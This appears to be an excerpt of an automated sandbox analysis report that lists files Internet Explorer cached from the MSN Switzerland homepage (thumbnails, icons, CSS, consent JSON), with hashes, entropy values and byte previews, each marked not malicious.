Preview:	......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....wE...m...G.#./..m...i....e...f...=;.....W.:...;....2.......wD...e...P...I..zo..h....N.....4.I....?..o..\|Q......@.o......N..........M...o..K@..............h.......)..q./..4.......O@...#./..-..?......m..\|S?.$........I,?.?..H5$...oD...m...I......@.o...............X..rs.......Y...7....2...............D\|Kg..s.....zi.E........?.........@..............iC ...A...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\BB1bgqeu[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	downloaded
Size (bytes):	11948
Entropy (8bit):	7.9435011600137235
Encrypted:	false
SSDEEP:	192:BY22c2hHhqtd9wdr9QgR0qdY8ETH8TnRALbfe77VrNn56I5xw8S7AdTjmVTj8rEU:e22c2RhqtdOFTrccTnefe77VrN5h5xw6
MD5:	F24D9A0437BB414780C047B6F6B81BA1
SHA1:	7A96EDB7B2860078016A8B1C6B63543E6EC9C906
SHA-256:	7B3B4B0EACD9D7F347CDD32401FBACFE099AD55B80813D9F9E5C2C0EFD296427
SHA-512:	985EFF39C5480C5DE6C9FA62E4DFD54ADF1456FBAA3832B0D5821771E229535A2BA3681348BA778FDEEC2008D9BCFD3D35381C8CB3B3FD7B3197F4A9C072C111
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1bgqeu.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg&x=2071&y=1423
Preview:	......JFIF.....`.`.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.......`..Z.(.....QL...(.QE-.%-.P!E<.e8..d...$..y.yQ.~.V<......*.!O...W]....FK.}j)o ....nk.n.t...&..&..n?Z.x...V...T~.?:ef..L.U...0.T..3.;..8.S....+Fh.T^x_...)Rh...+.5.-..:3..RQ...x4..i..%....1.h.R..m..)'4..~..GO.6....j8O.R....i1KE1.E-..1.QJE...zZ)j...(....Z.%--..(..b..-.......uE....I].&.3..cT...6...j...Dv.^3T..l..3..y..w.......T..].;9A...Y.P.K.'..].vo

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\BB1bguQV[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 206x250, frames 3
Category:	downloaded
Size (bytes):	7924
Entropy (8bit):	7.936946470095758
Encrypted:	false
SSDEEP:	192:BCVmuBC1aimFIfla3igvhD/Th1shEYGc3VoP8kes:kVmuBC1NE3iyhjTh1shEYGc3Jrs
MD5:	A7B1C0F0FE4273A0EA365E6C536D35D1
SHA1:	03DC4697C869075A2682DC369E8D4022AA8BB0AC
SHA-256:	FED43EC9089D4E69CD3B93FC40BF0996E2763E76C847D57947FD08D867076CD1
SHA-512:	789B2280117D9D35CD7D3FB33E5DB9514EC1E0A28B7E27737CD09EAC8C6ACC97CD70C28B728EBAC3C18240D6DFEA763673A73F6BF592B37E763BFFF4DD465128
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1bguQV.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.....,.,.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...........Ld. V.b.....XA....E...Qp..3..yJ..!.:Uy[4 ...-Io).].G......{..6-U.n....<.8.h.m..... .J.kg..4..^B.lm..;.+.......\|..h.....T.Z..dh.5n.S..+.!.....d..g.M.Z.]eGOZ..-.F..;[\....0........t.z...k'U....k..%.V...Yhf,......<...j.^Ew6s.(.wUe...1.T.~jW...Yh...,G.._i..c..S...L.K!Z.O0......4....4...sPHi.7J. .%.&..qU.I.V..(.\.QP.sR.}(...#..U..O.......OJd...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\BB6Ma4a[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	396
Entropy (8bit):	6.789155851158018
Encrypted:	false
SSDEEP:	6:6v/lhPkR/CnFPFaUSs1venewS8cJY1pXVhk5Ywr+hrYYg5Y2dFSkjhT5uMEjrTp:6v/78/kFPFnXleeH8YY9yEMpyk3Tc
MD5:	6D4A6F49A9B752ED252A81E201B7DB38
SHA1:	765E36638581717C254DB61456060B5A3103863A
SHA-256:	500064FB54947219AB4D34F963068E2DE52647CF74A03943A63DC5A51847F588
SHA-512:	34E44D7ECB99193427AA5F93EFC27ABC1D552CA58A391506ACA0B166D3831908675F764F25A698A064A8DA01E1F7F58FE7A6A40C924B99706EC9135540968F1A
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB6Ma4a.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J....!IDAT8Oc\|. ..?...\|.UA....GP.`\|. ......E...b.....&.>..x.h....c.....g.N...?5.1.8p.....>1..p...0.EA.A...0...cC/...0Ai8...._....p.....)....2...AE....Y?.......8p..d......$1l.%.8.<.6..Lf..a.........%.....-.q...8...4...."...`5..G!.\|..L....p8 ...p.......P....,..l.(..C]@L.#....P...)......8......[.7MZ.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\BBVuddh[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	304
Entropy (8bit):	6.758580075536471
Encrypted:	false
SSDEEP:	6:6v/lhPkR/ChmU5nXyNbWgaviGjZ/wtDi6Xxl32inTvUI8zVp:6v/78/e5nXyNb4lueg32au/
MD5:	245557014352A5F957F8BFDA87A3E966
SHA1:	9CD29E2AB07DC1FEF64B6946E1F03BCC0A73FC5C
SHA-256:	0A33B02F27EE6CD05147D81EDAD86A3184CCAF1979CB73AD67B2434C2A4A6379
SHA-512:	686345FD8667C09F905CA732DB98D07E1D72E7ECD9FD26A0C40FEE8E8985F8378E7B2CB8AE99C071043BCB661483DBFB905D46CE40C6BE70EEF78A2BCDE94605
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........+......IDAT8O...P...3.....v..`0.}...'..."XD.`.`.5.3. ....)...a.-.............d.g.mSC.i..%.8*].}....m.$I0M..u.. ...,9.........i....X..<.y..E..M....q... ."...,5+..]..BP.5.>R....iJ.0.7.\|?.....r.\-Ca......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\BBY7ARN[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	778
Entropy (8bit):	7.591554400063189
Encrypted:	false
SSDEEP:	12:6v/78/W/6TiO53VscuiflpvROsc13pPaOSuTJ8nKB8P9FekVA7WMZQ4CbAyvK0A:U/6WO5Fs2dBRGQOdl8Y8PHVA7DQ4CbX0
MD5:	7AEA772CD72970BB1C6EBCED8F2B3431
SHA1:	CB677B46C48684596953100348C24FFEF8DC4416
SHA-256:	FA59A5A8327DB116241771AFCD106B8B301B10DBBCB8F636003B121D7500DF32
SHA-512:	E245EF217FA451774B6071562C202CA2D4ACF7FC176C83A76CCA0A5860416C5AA31B1093528BF55E87DE6B5C03C5C2C9518AB6BF5AA171EC658EC74818E8AB2E
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBY7ARN.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8OMS[k.Q..v.....)&V."./(H. U..\|P,.....DP.}...bA.A\|.....J..k.5Mj..ic...^.3.Mq..33;.\......EK8.".2x.2.m;.}."..V...o..W7.\.5P...p.........2..+p..@4.-...R..{....3..#.-.. .E.Y....Z..L ..>z...[.F...h.........df_...-....8..s~.N...\|...,..Ux.5.FO#...E4.#.#.B.@..G.A.R._. .."g.s1.._@.u.zaC.F.n?.w.,6.R%N=a....B:.Z.UB...>r..}.....a.....\4.3.../a.Q.......k<..o.HN.At.(../)......D...u...7o.8\|....b.g..~3...Y8sy.1IlJ..d.o.0R]..8...y,\...+.V...:?B}.#g&.`G.........2.......#X.y).$..'.Z.t.7O.....g.J.2..`..soF...+....C.............z.....$.O:./...../].]..f.hW.....P....H.7..Qv...rat....+.(..s.n..w...S...S...G.%v.Q.aX.h.4....o.~.nL.lZ..6.=...@..?.f.H...[..I)..["w..r.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\NewErrorPageTemplate[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	1612
Entropy (8bit):	4.869554560514657
Encrypted:	false
SSDEEP:	24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
MD5:	DFEABDE84792228093A5A270352395B6
SHA1:	E41258C9576721025926326F76063C2305586F76
SHA-256:	77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
SHA-512:	E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
Malicious:	false
IE Cache URL:	res://ieframe.dll/NewErrorPageTemplate.css
Preview:	.body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\a5ea21[1].ico Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	758
Entropy (8bit):	7.432323547387593
Encrypted:	false
SSDEEP:	12:6v/792/6TCfasyRmQ/iyzH48qyNkWCj7ev50C5qABOTo+CGB++yg43qX4b9uTmMI:F/6easyD/iCHLSWWqyCoTTdTc+yhaX4v
MD5:	84CC977D0EB148166481B01D8418E375
SHA1:	00E2461BCD67D7BA511DB230415000AEFBD30D2D
SHA-256:	BBF8DA37D92138CC08FFEEC8E3379C334988D5AE99F4415579999BFBBB57A66C
SHA-512:	F47A507077F9173FB07EC200C2677BA5F783D645BE100F12EFE71F701A74272A98E853C4FAB63740D685853935D545730992D0004C9D2FE8E1965445CAB509C3
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Preview:	.PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D..M..............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q\|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq\|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\cfdbd9[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	740
Entropy (8bit):	7.552939906140702
Encrypted:	false
SSDEEP:	12:6v/70MpfkExg1J0T5F1NRlYx1TEdLh8vJ542irJQ5nnXZkCaOj0cMgL17jXGW:HMuXk5RwTTEovn0AXZMitL9aW
MD5:	FE5E6684967766FF6A8AC57500502910
SHA1:	3F660AA0433C4DBB33C2C13872AA5A95BC6D377B
SHA-256:	3B6770482AF6DA488BD797AD2682C8D204ED536D0D173EE7BB6CE80D479A2EA7
SHA-512:	AF9F1BABF872CBF76FC8C6B497E70F07DF1677BB17A92F54DC837BC2158423B5BF1480FF20553927ECA2E3F57D5E23341E88573A1823F3774BFF8871746FFA51
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/cfdbd9.png
Preview:	.PNG........IHDR................U....sBIT....\|.d.....pHYs...........~.....tEXtSoftware.Adobe Fireworks CS6......tEXtCreation Time.07/21/16.~y....<IDATH..;k.Q....;.;..&..#...4..2.....V,...X..~.{..\|.Cj......B$.%.nb....c1...w.YV....=g.............!..&.$.mI...I.$M.F3.}W,e.%..x.,..c..0.V....W.=0.uv.X...C....3`....s.....c..............2]E0.....M...^i...[..]5.&...g.z5]H....gf....I....u....:uy.8"....5...0.....z.............o.t...G.."....3.H....Y....3..G....v..T....a.&K......,T.\.[..E......?........D........M..9...ek..kP.A.`2.....k...D.}.\...V%.\..vIM..3.t....8.S.P..........9.....yI.<...9.....R.e.!`..-@........+.a..x..0.....Y.m.1..N.I...V.'..;.V..a.3.U....,.1c.-.J<..q.m-1...d.A..d.`.4.k..i.......SL.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\de-ch[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	436603
Entropy (8bit):	5.4360298909294675
Encrypted:	false
SSDEEP:	3072:yfcJUNxx+ZgrnfUJWcfoaIWhll010VYUKYCAVeMwVAhaQw/GULG:yfcOOZDh/010V9KYuLVMaQw/Gt
MD5:	F2A7CCDA3347EABCA40F600A66EB3867
SHA1:	EF2C78AE85A43140B79C6410C5BF2694DE5D2420
SHA-256:	E58866FB55AB280F45CCB8BE1D626BAD522224A087209227AD5503BD0CDBBCDE
SHA-512:	5AFF3BB5CA89E4FFA0A15E4230150860E00CC65002049150F52D9C3389DE54772B2A3CDE35FF66F0292E73E59AE3E7FB8E8D093BFB180C68C39F525D0FEBFD07
Malicious:	false
Preview:	<!DOCTYPE html><html prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#" lang="de-CH" class="hiperf" dir="ltr" >.. <head data-info="v:20201119_29074614;a:a1631581-8c9f-4b41-b00a-4c8209d92d24;cn:10;az:{did:951b20c4cd6d42d29795c846b4755d88, rid: 10, sn: neurope-prod-hp, dt: 2020-11-11T21:17:09.6909781Z, bt: 2020-11-20T01:40:24.4686269Z};ddpi:1;dpio:;dpi:1;dg:tmx.pc.ms.ie10plus;th:start;PageName:startPage;m:de-ch;cb:;l:de-ch;mu:de-ch;ud:{cid:,vk:homepage,n:,l:de-ch,ck:};xd:BBqgbZW;ovc:f;al:;fxd:f;xdpub:2020-11-17 22:04:31Z;xdmap:2020-11-23 09:00:45Z;axd:;f:msnallexpusers,muidflt9cf,muidflt14cf,muidflt15cf,muidflt29cf,muidflt49cf,muidflt56cf,complianceedge1cf,audexhp2cf,bingcollabhp1cf,article3cf,article4cf,onetrustpoplive,anaheim1cf,msnapp3cf,1s-bing-news,vebudumu04302020,bbh20200521msncf,strsl-spar-no,wfprong1c;userOptOut:false;userOptOutOptions:" data-js="{"dpi":1.0,"ddpi":1.0,"dpio":null,"forcedpi":null,"dms":6000,"ps&q

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\de-ch[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	74702
Entropy (8bit):	5.345294167813595
Encrypted:	false
SSDEEP:	768:hVAyLXfhINb6yvz6Ix1wTpCUVkhB1Ct4AityQ1NEDEEvCDcRiZfWUcU5Jfoc:hVhEvxaEC+biAEv3RiEkz
MD5:	754F6C92A735B47A2CC5E7D03C2102D1
SHA1:	71DDB35ED5E57812B895A939C77A0196B538AF40
SHA-256:	491BF15460B5FEF7B972E48841BACADA7549A01CA52E46297E9F91B2E978132D
SHA-512:	D3A859DBB25BA28D0401428A6C68B87F0BE3825DAA773B161A86D33164846FF67ADD99FD4A1CF3CA4613293DD2F629C5CE2E9A3E6E8A7C796A361F02CEFA3C68
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/6f0cca92-2dda-4588-a757-0e009f333603/de-ch.json
Preview:	{"DomainData":{"cctId":"55a804ab-e5c6-4b97-9319-86263d365d28","MainText":"Ihre Privatsph.re","MainInfoText":"Wir verarbeiten Ihre Daten, um Inhalte oder Anzeigen bereitzustellen, und analysieren die Bereitstellung solcher Inhalte oder Anzeigen, um Erkenntnisse .ber unsere Website zu gewinnen. Wir teilen diese Informationen mit unseren Partnern auf der Grundlage einer Einwilligung und berechtigter Interessen. Sie k.nnen Ihr Recht auf Einwilligung oder Widerspruch gegen ein berechtigtes Interesse aus.ben, und zwar auf der Grundlage eines der folgenden bestimmten Zwecke oder auf Partnerebene .ber den Link unter jedem Zweck. Diese Entscheidungen werden an unsere Anbieter, die am Transparency and Consent Framework teilnehmen, signalisiert.","AboutText":"Weitere Informationen","AboutCookiesText":"Ihre Privatsph.re","ConfirmText":"Alle zulassen","AllowAllText":"Einstellungen speichern","CookiesUsedText":"Verwendete Cookies","AboutLink":"https://go.microsoft.com/fwlink/?LinkId=521839","H

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\down[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 15 x 15, 8-bit colormap, non-interlaced
Category:	downloaded
Size (bytes):	748
Entropy (8bit):	7.249606135668305
Encrypted:	false
SSDEEP:	12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
MD5:	C4F558C4C8B56858F15C09037CD6625A
SHA1:	EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
SHA-256:	39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
SHA-512:	D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
Malicious:	false
IE Cache URL:	res://ieframe.dll/down.png
Preview:	.PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?\|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\http___cdn.taboola.com_libtrc_static_thumbnails_4c54d33aa3e66e14870250b2a588e89b[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	8162
Entropy (8bit):	7.938751431218554
Encrypted:	false
SSDEEP:	192:6pP8Cj66vI+CGerwzaBVd4b1smfxYNTHRO9hmFmAiJ+QaVv:6Z8CjNGvmTUxuhFi
MD5:	A3275337E701B77E2251BD6136E2305B
SHA1:	81BC6CF1621A6348BEAB8CF9B25294AF046383E7
SHA-256:	E2AC8254773B7E40A39E2930A13E79A9A4D265D27CE1B5C18AB20CA1891C294E
SHA-512:	E86E1EDF4B9D4B9BF312DB094E0EB528C5C3A4DAD218CCCB20DFC6A7B7DAF045BBF18EA1215979C981B2618C319138F014E1DA9B0026F96A94FFE7B7C5D038F9
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F4c54d33aa3e66e14870250b2a588e89b.jpg
Preview:	......JFIF...........................................%......%!(!.!(!;/))/;E:7:ESJJSici................................%......%!(!.!(!;/))/;E:7:ESJJSici.........7...."..........4................................................................?..`s._..-O...5.0.\.u...~...~.A.V..~..0....]....D..)/.........K.....C?l....a.`.y$......_@h3.d.E....y....N.Q....}--C./l..U.....L.. I .bFf.&Fe...s=&.W.Y.E.XEK;..z[...#X..Abm.3m...=....h..U ......2f..}.8f.!.E.\|.Cs.H...6.b....7S$=s.PhE."_H.Q.O..6n.tW+.t8..(3.3....`.m...l.`.a3uBHz.XSu..l....(....nD......1....KH.I.4..k;W 6m......Y.j.#9..J.dQp.H..y.s.[9.V..n..l.f..KX.3<.N.R5...HSUh&.~.mCC.....M..k...oQ..mdkMOG;@4.U.$.=...a.T...ga.7....;u..0.....g^...e.g.V^.X.nF(K...D.......M.E..................Cr.-.....2...0d..3.Hy.-.j..2OE...`.E!...0..w.....6.FuS.G.....O.NI%RvuN..;.M.@...J......42P..n.^.\|.gx..C.e.H=.>z..W.?Ko6..I^n......-.A...}5^.,^.]@lEW.....j..7......B.....l`..@.&)...L.....'%.M.....n...G.L.0.o3...65.J...CJ...>..e.1.d.F

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\http___cdn.taboola.com_libtrc_static_thumbnails_cf4d537aaf8d1a7be3eaac9e354c5338[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	17172
Entropy (8bit):	7.965367282743104
Encrypted:	false
SSDEEP:	384:rniYReqlf6oFdHG3qmE1vnYxJ+pR5C1IE/u2hHbSsXL:rnzFdHG6mE1g7+j5C1lbh7L7
MD5:	2FCD74AD9F4A4D360B6E6D78B8E6C619
SHA1:	F370D6BD35D3183EC0770A047CED096B03AC0D1D
SHA-256:	E833B4327EA576E7614F32A456E98D2931D4F71E45B6320E325B1B5D412093C3
SHA-512:	36BA9EB4658FE804ECC3F1DCC9E9FDD57D86374EC31B1E46A6CCB369D9BAFF125A93C5A1F4A537008D0CF183208D16C8083ADB8F48905B4256E8A33F707C8782
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%2Cg_xy_center%2Cx_557%2Cy_313/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fcf4d537aaf8d1a7be3eaac9e354c5338.png
Preview:	......JFIF.....................................................................&""&0-0>>T............................."......".$...$.6&&6>424>LDDL_Z_\|\|.......7...............7....................................................................)H!.D8!.B..!....G...B ..B..!.B8!...!B.."...C...!...pBB.!.D.....C...pB..!B..A.B8A.B...B.....n.<.C..G.!.B..#.8!.OEz^;j.aIWD.....;.5{.y..UA.B..!.E.RD>i!=k.x$!.t......q.w.G.pD.EL.)[..#c75.......Z......!..l..... h.G.!...X..::..7Qv.EY...-..n.J.'.....t!.B...s.......!."...n;].....j..5..........z.....!....oX..6y..Rbg...i..5..l.]]..m.i.\..S]{{..].G..K.>Kd.....s.<.K..N...Y..s6.q.>.. ..F^...2[].=6,.%.I...o'#...$..I.~C.p.l....[M5bu.~.,...;].....;...L...Smg...F...[-.N.uXP.`.....ov^...._....I.W..{.MZ..u.i.7....{M>...).V.!.N..l.;..lm......U.^....z37>..=N...rk.9.&~..h0.=...j...'...9..W....3.`.%.y...............Q....[....OI.D.G..}.=......T.Q(D>.u............K......LO3........).lW.q:.......hUEX..(B.J.z..%q...iA.J...F..c...z.F.+y.n..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\iab2Data[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	180232
Entropy (8bit):	5.115010741936028
Encrypted:	false
SSDEEP:	768:l3JqIWlR2TryukPPnLLuAlGpWAowa8A5NbNQ8nYHv:l3JqIcATDELLxGpEw7Aq8YP
MD5:	EC3D53697497B516D3A5764E2C2D2355
SHA1:	0CDA0F66188EBF363F945341A4F3AA2E6CFE78D3
SHA-256:	2ABD991DABD5977796DB6AE4D44BD600768062D69EE192A4AF2ACB038E13D843
SHA-512:	CC35834574EF3062CCE45792F9755F1FB4B63DDD399A5B44C40555D191411F0B8924E5C2FEFCD08BAC69E1E6D6275E121CABB4A84005288A7452922F94BE5658
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/iab2Data.json
Preview:	{"gvlSpecificationVersion":2,"tcfPolicyVersion":2,"features":{"1":{"descriptionLegal":"Vendors can:\n* Combine data obtained offline with data collected online in support of one or more Purposes or Special Purposes.","id":1,"name":"Match and combine offline data sources","description":"Data from offline data sources can be combined with your online activity in support of one or more purposes"},"2":{"descriptionLegal":"Vendors can:\n* Deterministically determine that two or more devices belong to the same user or household\n* Probabilistically determine that two or more devices belong to the same user or household\n* Actively scan device characteristics for identification for probabilistic identification if users have allowed vendors to actively scan device characteristics for identification (Special Feature 2)","id":2,"name":"Link different devices","description":"Different devices can be determined as belonging to you or your household in support of one or more of purposes."},"3":{"de

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\j3XtWX[1].avi Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	data
Category:	downloaded
Size (bytes):	5
Entropy (8bit):	2.321928094887362
Encrypted:	false
SSDEEP:	3:3:3
MD5:	5BFA51F3A417B98E7443ECA90FC94703
SHA1:	8C015D80B8A23F780BDD215DC842B0F5551F63BD
SHA-256:	BEBE2853A3485D1C2E5C5BE4249183E0DDAFF9F87DE71652371700A89D937128
SHA-512:	4CD03686254BB28754CBAA635AE1264723E2BE80CE1DD0F78D1AB7AEE72232F5B285F79E488E9C5C49FF343015BD07BB8433D6CEE08AE3CEA8C317303E3AC399
Malicious:	false
